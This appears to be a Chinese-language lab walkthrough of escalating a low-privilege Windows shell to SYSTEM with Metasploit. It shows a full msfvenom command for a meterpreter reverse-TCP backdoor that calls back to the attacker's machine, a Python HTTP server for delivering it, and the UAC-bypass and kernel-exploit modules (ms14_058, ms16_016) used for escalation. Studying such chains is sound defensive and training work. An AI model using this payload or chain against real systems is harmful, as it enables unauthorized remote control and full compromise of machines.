先用msfvenom做一个码,上传到目标机,获得一个低权限的shell,然后getsystem,失败
目录
目标机的管理员用户,那么接下来我就用这个y1用户登录
目标机的ip
kali的ip
制作一个名为mantouka的后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.34 LPORT=6666 -f exe > mantouka.exe
用python开启一个简易的http服务
python3 -m http.server 7777
目标机访问
kali设置监听
kali监听好后,目标机去执行这个后门触发shell
尝试getsystem失败
查看当前低权限session
UAC提示绕过
使用exploit/windows/local/ask,去绕过UAC
设置session和显示的名字,然后开始监听
目标机点是
成功得到system
UAC不提示绕过
使用exploit/windows/local/bypassuac(yes部分设置好)
这的sessino我还是选的低权限session
然后直接执行exploit,就会获得一个新的session
然后直接成功提权,没有报错,也没有提示UAC
漏洞提权
use exploit/windows/local/ms14_058_track_popup_men
yes的地方设置下,session还是选低权限那个2
成功利用漏洞提权
然后直接用getsystem就好了
也可以试试其他的本地exploit
搜索ms16_016
把yes的地方设置依稀,这里的session我依旧是选的低权限
执行exploit,成功得到新的session
而且直接就是system权限